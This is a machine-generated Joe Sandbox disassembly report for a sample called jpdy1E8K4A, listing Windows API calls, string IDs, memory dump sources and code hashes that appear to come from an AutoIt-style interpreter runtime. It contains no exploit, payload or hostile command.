• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                • API String ID: 3631882475-2268648507
                                                                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
Similarity
• API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
• String ID:
• API String ID: 4116747274-0
• Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
• Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00461678
• _wcslen.LIBCMT ref: 00461683
• __swprintf.LIBCMT ref: 00461721
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
• GetClassNameW.USER32(?,?,00000400), ref: 00461811
• GetDlgCtrlID.USER32(?), ref: 00461869
• GetWindowRect.USER32(?,?), ref: 004618A4
• GetParent.USER32(?), ref: 004618C3
• ScreenToClient.USER32(00000000), ref: 004618CA
• GetClassNameW.USER32(?,?,00000100), ref: 00461941
• GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
Strings
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
• Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
• Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
• Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
Strings
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
• Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
• Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
• Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Strings
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
• Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
• Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
• Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
• Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1976180769-4113822522
• Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
• Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
• Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
• Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
APIs
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__fassign
• String ID:
• API String ID: 461458858-0
• Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
• Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 3969911579-0
                                                                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                • String ID: 0
                                                                                                • API String ID: 956284711-4108050209
                                                                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                • String ID: 0.0.0.0
                                                                                                • API String ID: 1965227024-3771769585
                                                                                                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: SendString$_memmove_wcslen
                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                • API String ID: 369157077-1007645807
                                                                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                APIs
                                                                                                • GetParent.USER32 ref: 00445BF8
                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                • API String ID: 3125838495-3381328864
                                                                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CharNext
                                                                                                • String ID:
                                                                                                • API String ID: 1350042424-0
                                                                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                APIs
                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                • _wcscpy.LIBCMT ref: 004787E5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                • API String ID: 3052893215-2127371420
                                                                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Similarity
                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                • API String ID: 2295938435-2354261254
                                                                                                APIs
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                • API String ID: 3038501623-2263619337
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                • API String ID: 2295938435-8599901
                                                                                                APIs
                                                                                                • timeGetTime.WINMM ref: 00443B67
                                                                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                • IsWindow.USER32(?), ref: 00443C3A
                                                                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                • String ID: BUTTON
                                                                                                • API String ID: 1834419854-3405671355
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • _wprintf.LIBCMT ref: 00454074
                                                                                                • __swprintf.LIBCMT ref: 004540A3
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
